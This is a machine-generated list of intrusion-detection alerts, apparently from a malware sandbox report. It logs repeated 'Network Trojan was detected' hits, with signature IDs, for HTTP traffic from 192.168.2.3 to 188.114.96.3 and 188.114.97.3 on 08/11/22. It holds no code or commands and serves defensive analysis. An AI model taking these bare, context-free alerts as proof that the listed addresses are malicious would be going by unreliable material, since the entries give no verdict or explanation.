                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349889802021641 08/11/22-06:44:01.764745
                SID:2021641
                Source Port:49889
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349759802021641 08/11/22-06:42:31.695874
                SID:2021641
                Source Port:49759
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349838802825766 08/11/22-06:43:24.421881
                SID:2825766
                Source Port:49838
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349890802024318 08/11/22-06:44:03.457387
                SID:2024318
                Source Port:49890
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349748802024313 08/11/22-06:42:19.613257
                SID:2024313
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349745802024313 08/11/22-06:42:16.160936
                SID:2024313
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349742802024317 08/11/22-06:42:12.661275
                SID:2024317
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349823802025381 08/11/22-06:43:13.321407
                SID:2025381
                Source Port:49823
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349895802021641 08/11/22-06:44:06.157277
                SID:2021641
                Source Port:49895
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349896802025381 08/11/22-06:44:07.789189
                SID:2025381
                Source Port:49896
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349754802024313 08/11/22-06:42:26.308314
                SID:2024313
                Source Port:49754
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349843802024313 08/11/22-06:43:31.924022
                SID:2024313
                Source Port:49843
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349748802024318 08/11/22-06:42:19.613257
                SID:2024318
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349792802021641 08/11/22-06:42:59.404301
                SID:2021641
                Source Port:49792
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349887802024318 08/11/22-06:43:58.405291
                SID:2024318
                Source Port:49887
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349884802021641 08/11/22-06:43:54.330408
                SID:2021641
                Source Port:49884
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349885802025381 08/11/22-06:43:55.376397
                SID:2025381
                Source Port:49885
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349760802825766 08/11/22-06:42:32.923604
                SID:2825766
                Source Port:49760
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349774802825766 08/11/22-06:42:44.099150
                SID:2825766
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349800802021641 08/11/22-06:43:08.046752
                SID:2021641
                Source Port:49800
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349879802025381 08/11/22-06:43:48.403290
                SID:2025381
                Source Port:49879
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349817802025381 08/11/22-06:43:11.901228
                SID:2025381
                Source Port:49817
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349780802825766 08/11/22-06:42:49.154690
                SID:2825766
                Source Port:49780
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349759802825766 08/11/22-06:42:31.695874
                SID:2825766
                Source Port:49759
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349761802021641 08/11/22-06:42:34.002289
                SID:2021641
                Source Port:49761
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349788802024313 08/11/22-06:42:54.331478
                SID:2024313
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349747802025381 08/11/22-06:42:18.537201
                SID:2025381
                Source Port:49747
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349791802024313 08/11/22-06:42:58.117986
                SID:2024313
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349882802021641 08/11/22-06:43:51.663595
                SID:2021641
                Source Port:49882
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349897802825766 08/11/22-06:44:08.828123
                SID:2825766
                Source Port:49897
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349800802825766 08/11/22-06:43:08.046752
                SID:2825766
                Source Port:49800
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349853802024318 08/11/22-06:43:40.660156
                SID:2024318
                Source Port:49853
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349793802021641 08/11/22-06:43:00.645450
                SID:2021641
                Source Port:49793
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349744802024318 08/11/22-06:42:15.052087
                SID:2024318
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349791802024318 08/11/22-06:42:58.117986
                SID:2024318
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349794802025381 08/11/22-06:43:01.964847
                SID:2025381
                Source Port:49794
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349881802024318 08/11/22-06:43:50.015660
                SID:2024318
                Source Port:49881
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349793802825766 08/11/22-06:43:00.645450
                SID:2825766
                Source Port:49793
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349828802024313 08/11/22-06:43:14.503252
                SID:2024313
                Source Port:49828
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349882802825766 08/11/22-06:43:51.663595
                SID:2825766
                Source Port:49882
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349881802024313 08/11/22-06:43:50.015660
                SID:2024313
                Source Port:49881
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349883802025381 08/11/22-06:43:53.308240
                SID:2025381
                Source Port:49883
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349746802825766 08/11/22-06:42:17.452589
                SID:2825766
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349780802021641 08/11/22-06:42:49.154690
                SID:2021641
                Source Port:49780
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349751802024318 08/11/22-06:42:22.964431
                SID:2024318
                Source Port:49751
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349753802025381 08/11/22-06:42:25.207102
                SID:2025381
                Source Port:49753
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349828802024318 08/11/22-06:43:14.503252
                SID:2024318
                Source Port:49828
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349840802024318 08/11/22-06:43:28.505356
                SID:2024318
                Source Port:49840
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349745802024318 08/11/22-06:42:16.160936
                SID:2024318
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349751802024313 08/11/22-06:42:22.964431
                SID:2024313
                Source Port:49751
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349786802024318 08/11/22-06:42:53.219319
                SID:2024318
                Source Port:49786
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349840802024313 08/11/22-06:43:28.505356
                SID:2024313
                Source Port:49840
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349875802024318 08/11/22-06:43:47.334573
                SID:2024318
                Source Port:49875
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349898802021641 08/11/22-06:44:09.907279
                SID:2021641
                Source Port:49898
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349774802021641 08/11/22-06:42:44.099150
                SID:2021641
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349879802024313 08/11/22-06:43:48.403290
                SID:2024313
                Source Port:49879
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349763802025381 08/11/22-06:42:39.324991
                SID:2025381
                Source Port:49763
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349875802024313 08/11/22-06:43:47.334573
                SID:2024313
                Source Port:49875
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349811802021641 08/11/22-06:43:10.662100
                SID:2021641
                Source Port:49811
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349780802024313 08/11/22-06:42:49.154690
                SID:2024313
                Source Port:49780
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349879802024318 08/11/22-06:43:48.403290
                SID:2024318
                Source Port:49879
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349752802025381 08/11/22-06:42:24.044623
                SID:2025381
                Source Port:49752
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349789802021641 08/11/22-06:42:55.412963
                SID:2021641
                Source Port:49789
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349780802024318 08/11/22-06:42:49.154690
                SID:2024318
                Source Port:49780
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349762802024313 08/11/22-06:42:35.961537
                SID:2024313
                Source Port:49762
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349762802024318 08/11/22-06:42:35.961537
                SID:2024318
                Source Port:49762
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349777802825766 08/11/22-06:42:45.276948
                SID:2825766
                Source Port:49777
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349745802025381 08/11/22-06:42:16.160936
                SID:2025381
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349843802025381 08/11/22-06:43:31.924022
                SID:2025381
                Source Port:49843
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349749802825766 08/11/22-06:42:20.745320
                SID:2825766
                Source Port:49749
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349832802024313 08/11/22-06:43:19.747801
                SID:2024313
                Source Port:49832
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349745802825766 08/11/22-06:42:16.160936
                SID:2825766
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349897802024313 08/11/22-06:44:08.828123
                SID:2024313
                Source Port:49897
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349749802025381 08/11/22-06:42:20.745320
                SID:2025381
                Source Port:49749
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349778802025381 08/11/22-06:42:46.945645
                SID:2025381
                Source Port:49778
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349843802825766 08/11/22-06:43:31.924022
                SID:2825766
                Source Port:49843
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349746802021641 08/11/22-06:42:17.452589
                SID:2021641
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349752802825766 08/11/22-06:42:24.044623
                SID:2825766
                Source Port:49752
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349756802024313 08/11/22-06:42:28.447484
                SID:2024313
                Source Port:49756
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:188.114.96.3192.168.2.380497882025483 08/11/22-06:42:54.430865
                SID:2025483
                Source Port:80
                Destination Port:49788
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349800802025381 08/11/22-06:43:08.046752
                SID:2025381
                Source Port:49800
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349850802024318 08/11/22-06:43:33.879385
                SID:2024318
                Source Port:49850
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349790802024313 08/11/22-06:42:56.651534
                SID:2024313
                Source Port:49790
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349850802024313 08/11/22-06:43:33.879385
                SID:2024313
                Source Port:49850
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349777802025381 08/11/22-06:42:45.276948
                SID:2025381
                Source Port:49777
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349796802025381 08/11/22-06:43:04.193279
                SID:2025381
                Source Port:49796
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349867802024318 08/11/22-06:43:45.824252
                SID:2024318
                Source Port:49867
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349790802024318 08/11/22-06:42:56.651534
                SID:2024318
                Source Port:49790
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349859802021641 08/11/22-06:43:42.759258
                SID:2021641
                Source Port:49859
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349896802825766 08/11/22-06:44:07.789189
                SID:2825766
                Source Port:49896
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349832802024318 08/11/22-06:43:19.747801
                SID:2024318
                Source Port:49832
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349795802024318 08/11/22-06:43:03.020333
                SID:2024318
                Source Port:49795
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349890802021641 08/11/22-06:44:03.457387
                SID:2021641
                Source Port:49890
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349760802025381 08/11/22-06:42:32.923604
                SID:2025381
                Source Port:49760
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349795802024313 08/11/22-06:43:03.020333
                SID:2024313
                Source Port:49795
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349887802024313 08/11/22-06:43:58.405291
                SID:2024313
                Source Port:49887
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349759802024318 08/11/22-06:42:31.695874
                SID:2024318
                Source Port:49759
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349754802024318 08/11/22-06:42:26.308314
                SID:2024318
                Source Port:49754
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349778802825766 08/11/22-06:42:46.945645
                SID:2825766
                Source Port:49778
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:188.114.96.3192.168.2.380498852025483 08/11/22-06:43:55.477446
                SID:2025483
                Source Port:80
                Destination Port:49885
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349796802825766 08/11/22-06:43:04.193279
                SID:2825766
                Source Port:49796
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349742802024312 08/11/22-06:42:12.661275
                SID:2024312
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349759802024313 08/11/22-06:42:31.695874
                SID:2024313
                Source Port:49759
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349898802024318 08/11/22-06:44:09.907279
                SID:2024318
                Source Port:49898
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349748802021641 08/11/22-06:42:19.613257
                SID:2021641
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349895802024318 08/11/22-06:44:06.157277
                SID:2024318
                Source Port:49895
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349747802825766 08/11/22-06:42:18.537201
                SID:2825766
                Source Port:49747
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349798802025381 08/11/22-06:43:06.576803
                SID:2025381
                Source Port:49798
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349888802025381 08/11/22-06:44:00.133246
                SID:2025381
                Source Port:49888
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349792802024318 08/11/22-06:42:59.404301
                SID:2024318
                Source Port:49792
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349797802021641 08/11/22-06:43:05.379365
                SID:2021641
                Source Port:49797
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349895802024313 08/11/22-06:44:06.157277
                SID:2024313
                Source Port:49895
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349754802021641 08/11/22-06:42:26.308314
                SID:2021641
                Source Port:49754
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349852802024313 08/11/22-06:43:38.361573
                SID:2024313
                Source Port:49852
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349785802024318 08/11/22-06:42:51.879415
                SID:2024318
                Source Port:49785
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349794802021641 08/11/22-06:43:01.964847
                SID:2021641
                Source Port:49794
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349884802024318 08/11/22-06:43:54.330408
                SID:2024318
                Source Port:49884
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349755802021641 08/11/22-06:42:27.395952
                SID:2021641
                Source Port:49755
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349892802021641 08/11/22-06:44:04.916628
                SID:2021641
                Source Port:49892
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349792802024313 08/11/22-06:42:59.404301
                SID:2024313
                Source Port:49792
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349753802825766 08/11/22-06:42:25.207102
                SID:2825766
                Source Port:49753
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349757802024313 08/11/22-06:42:29.610436
                SID:2024313
                Source Port:49757
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349785802024313 08/11/22-06:42:51.879415
                SID:2024313
                Source Port:49785
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349782802024313 08/11/22-06:42:50.570997
                SID:2024313
                Source Port:49782
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349805802025381 08/11/22-06:43:09.287221
                SID:2025381
                Source Port:49805
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349867802021641 08/11/22-06:43:45.824252
                SID:2021641
                Source Port:49867
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349786802825766 08/11/22-06:42:53.219319
                SID:2825766
                Source Port:49786
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349782802024318 08/11/22-06:42:50.570997
                SID:2024318
                Source Port:49782
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349788802021641 08/11/22-06:42:54.331478
                SID:2021641
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349743802025381 08/11/22-06:42:14.045456
                SID:2025381
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349881802825766 08/11/22-06:43:50.015660
                SID:2825766
                Source Port:49881
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:188.114.97.3192.168.2.380497852025483 08/11/22-06:42:51.983930
                SID:2025483
                Source Port:80
                Destination Port:49785
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349756802024318 08/11/22-06:42:28.447484
                SID:2024318
                Source Port:49756
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349793802024313 08/11/22-06:43:00.645450
                SID:2024313
                Source Port:49793
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349744802825766 08/11/22-06:42:15.052087
                SID:2825766
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349746802024318 08/11/22-06:42:17.452589
                SID:2024318
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349791802021641 08/11/22-06:42:58.117986
                SID:2021641
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349793802024318 08/11/22-06:43:00.645450
                SID:2024318
                Source Port:49793
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349885802825766 08/11/22-06:43:55.376397
                SID:2825766
                Source Port:49885
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349823802825766 08/11/22-06:43:13.321407
                SID:2825766
                Source Port:49823
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349897802024318 08/11/22-06:44:08.828123
                SID:2024318
                Source Port:49897
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349830802025381 08/11/22-06:43:16.837786
                SID:2025381
                Source Port:49830
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349853802825766 08/11/22-06:43:40.660156
                SID:2825766
                Source Port:49853
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349884802024313 08/11/22-06:43:54.330408
                SID:2024313
                Source Port:49884
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349852802024318 08/11/22-06:43:38.361573
                SID:2024318
                Source Port:49852
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349757802024318 08/11/22-06:42:29.610436
                SID:2024318
                Source Port:49757
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349817802825766 08/11/22-06:43:11.901228
                SID:2825766
                Source Port:49817
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349758802825766 08/11/22-06:42:30.656105
                SID:2825766
                Source Port:49758
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349889802025381 08/11/22-06:44:01.764745
                SID:2025381
                Source Port:49889
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349828802021641 08/11/22-06:43:14.503252
                SID:2021641
                Source Port:49828
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349751802021641 08/11/22-06:42:22.964431
                SID:2021641
                Source Port:49751
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349786802021641 08/11/22-06:42:53.219319
                SID:2021641
                Source Port:49786
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349811802024318 08/11/22-06:43:10.662100
                SID:2024318
                Source Port:49811
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349898802024313 08/11/22-06:44:09.907279
                SID:2024313
                Source Port:49898
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349805802021641 08/11/22-06:43:09.287221
                SID:2021641
                Source Port:49805
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349817802024313 08/11/22-06:43:11.901228
                SID:2024313
                Source Port:49817
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349828802825766 08/11/22-06:43:14.503252
                SID:2825766
                Source Port:49828
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349817802024318 08/11/22-06:43:11.901228
                SID:2024318
                Source Port:49817
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349794802825766 08/11/22-06:43:01.964847
                SID:2825766
                Source Port:49794
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
